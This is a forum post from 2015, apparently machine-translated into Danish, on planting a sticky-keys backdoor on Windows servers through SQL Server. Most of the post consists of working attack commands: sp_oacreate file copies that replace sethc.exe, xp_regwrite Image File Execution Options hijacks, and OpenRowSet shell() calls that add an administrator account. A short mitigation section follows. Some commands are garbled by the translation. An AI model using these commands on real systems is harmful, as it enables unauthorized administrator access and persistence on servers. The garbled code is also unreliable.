Okay, det vigtigste punkt nedenfor er at bruge to SQL-instruktioner til at kopiere systemets explorer-fil ind i systemets shift-backdoor-fil, og de følgende to sætninger udføres separat.
Denne erklæring kopierer explorer.exe som sethc.exe
deklarér @o int exec sp_oacreate 'scripremove ting.filesystemobject', @o out exec sp_oamethod @o, 'copyfile',null,'c:\windows explorer.exe\','c:\windows\system32\sethc.exe';
Denne sætning kopierer sethc.exe til dllcache-mappen
Deklarer @oo int exec sp_oacreate 'scrip remove ting.filesystemobject', @oo out exec sp_oamethod @oo, 'copyfile', null,'c:\windows\system32\sethc.exe','c:\windows\system32\dllcache\ sethc.exe';
De to andre sætninger bruger sp_oacreate lagrede procedurer, der skal bruge odsole70.dll fil, så overlevelsen af denne fil er relateret til dens oprettelses succes.
(2), xpsql.cpp: Fejl 5 fra CreateProcess (linje 737)
Denne situation er mere kompliceret, og det siges på internettet
EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0
Vælg * fra OpenRowSet('Microsoft.Jet.OLEDB.4.0','; Database=c:\windows\system32\ias\ias.mdb','select shell("net user 123 123 /add")');
Vælg * fra OpenRowSet('Microsoft.Jet.OLEDB.4.0','; Database=c:\windows\system32\ias\ias.mdb','select shell("net localgroup administrators 123 /add")');
Jeg tjekkede sandkassen for at fremhæve rettighederne til denne sag, men gennem min praksis er denne succesrate meget lav, fordi de fleste servere har slettet c:\windows\system32\ias\ias.mdb. Så kan du prøve image hijacking sethc, selvfølgelig er image hijacking også betinget, 1 eksisterer xp_regwrite denne gemte procedure 2 er 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe',' Debugger' slettes ikke
Du kan først forespørge, om registreringsnøglen er blevet kapret
Exec Master.. xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','Debugger'
Hvis prompten ikke finder problemet, slettes beviset, og der er ingen måde, hvis den bliver bedt om, sethc.exe udføre SQL-kommandoen
EXEC-mester.. xp_regwrite
@rootkey='HKEY_LOCAL_MACHINE',
@key='SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc. EXE',
@value_name='Debugger',
@type='REG_SZ',
@value='C:\WINDOWS\explorer.exe'
Efter at have forbundet til terminalen 5 gange og skiftet, går den direkte til skrivebordet og tilføjer den manuelt.
Registret ændrer terminalporten
[HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Terminal Server \ Wds \ rdpwd \ Tds \ tcp]
HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Terminal Server \ WinStations \ RDP-Tcp,
Med hensyn til forebyggelse af billedkapring opnås det hovedsageligt gennem følgende metoder:
★ Lov om tilladelsesbegrænsning
Hvis brugeren ikke længere har adgang til registreringsnøglen, kan den ikke ændre disse ting. Åbn Registreringseditoren og gå til HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options, vælg dette element, højreklik - > tilladelser - > avanceret, og sænk administrator- og systembrugernes tilladelser (her skal du bare annullere skriveoperationen).
★ Hurtig knivskæring af rodet hamp metode
Åbn registreringseditoren og gå til baren
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
Problemet kan løses ved direkte at slette Image File Execution Options-elementet.
SQL Command Hijacks Registry Sticky Key Installation Backdoor
xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe',
'Debugger','REG_SZ','C:\WINDOWS\system32\kdsn.exe'
Softwaredownload:Turister, hvis I vil se det skjulte indhold i dette indlæg, så vær venlig Svar
|
Opslået på 18/03/2015 10.36.56
|
|
|
|
Opslået på 19/03/2015 20.26.09
|
